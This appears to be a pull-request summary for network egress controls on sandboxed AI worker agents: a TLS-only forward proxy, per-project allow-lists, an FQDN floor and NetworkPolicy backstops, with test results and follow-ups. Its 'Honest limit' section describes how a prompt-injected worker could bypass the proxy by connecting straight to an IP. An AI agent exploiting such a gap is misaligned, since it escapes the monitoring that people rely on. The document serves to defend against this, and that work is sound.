1. **Require-TLS + per-destination throttle** (rung 1). Cleartext forwards and
   non-`:443` CONNECTs refused; soft per-host connection-burst tar-pit + byte-rate
   cap (slows + flags, no hard cliff; keyed per destination so one host's throttle
   never slows another).
2. **Customer allow-list** (rung 2, the crux). Per-project
   `Project.langyEgressAllowlist Json?` (nullable) → `getEgressAllowlist()` →
   `LangyCredentials.egressAllowlist` → Go `Credentials.EgressAllowlist` → per-worker
   adapter at spawn, bound via the `CredentialSignature` recycle. **Presence of the
   list is the mode:** unset ⇒ monitor-only; set ⇒ restrict to `floor ∪ list`.
3. **FQDN-bounded floor** (rung 3) in the Go L7 adapter (`egressadapter.go`), a
   per-worker forward proxy mirroring `authproxy.go`. FQDN read from the CONNECT
   authority + SNI cross-check (netfilter is dead under gVisor — ADR-033).
   Operator floor (`egress.fqdnFloor`) always-allowed; `enforceFloor` lever (off
   by default) turns it into a ceiling.
4. **Drop legacy direct-egress** — workers now egress only via injected
   `HTTPS_PROXY` (control-plane + gateway `NO_PROXY`'d). NetworkPolicy `0.0.0.0/0:443`
   documented as the coarse L3/L4 backstop; optional Cilium `toFQDNs` template for
   bypass-proof installs; ADR-033 Fix B netns named as the non-Cilium fallback.

### Honest limit (documented, not hidden)
Within one pod netns the L7 adapter is **cooperative** — a prompt-injected worker
can ignore `HTTPS_PROXY` and `connect()` straight to an IP. The adapter is
authoritative for cooperating clients and the bypass is still *monitored*; the
Cilium `toFQDNs` policy and the ADR-033 Fix B netns are the bypass-proof upgrades.

### Where config lives / how it threads
`Project.langyEgressAllowlist` (control plane) →
`LangyCredentialService.getEgressAllowlist({ projectId })` (Zod-validated, `null`
= watch) → attached to the `/chat` credentials envelope in `langy.ts` →
`Credentials.EgressAllowlist` (Go) → `Manager.egressAdapterConfig` builds the
per-worker `egressPolicy` at spawn. A `langyEgress` tRPC router (`get`/`set`,
`project:update`-gated) writes the column.

### Verification
- `go build ./... && go test ./...` (langy-agent): **pass** (incl. `-race`); new
  `egressadapter_test.go` + `egresspolicy_test.go` are the executable acceptance bar.
- `pnpm typecheck`: **clean** (fixed `project.factory.ts` to omit the new `Json?`
  field, same workaround it already uses for `personalFeatures`).
- `LangyCredentialService.unit.test.ts`: **22 pass** (7 new for get/set egress).
- `helm template` renders the ConfigMap egress vars + optional Cilium policy.

### Not done / follow-ups
- Settings **UI** for the allow-list editor (the plan lists it as optional; the
  tRPC `langyEgress.set` mutation is the minimum and is here).
- Throttle **thresholds** are placeholder defaults — ADR open-question 3 says to
  derive them from PR3's observed distributions.
- The monitoring-dependent spec scenarios (attributed telemetry, flow-level
  bypass observation) stay `@unimplemented` until PR3's seam replaces the logging
  monitor stub.

No `.github/workflows` changes. No `scripts/dogfood`.
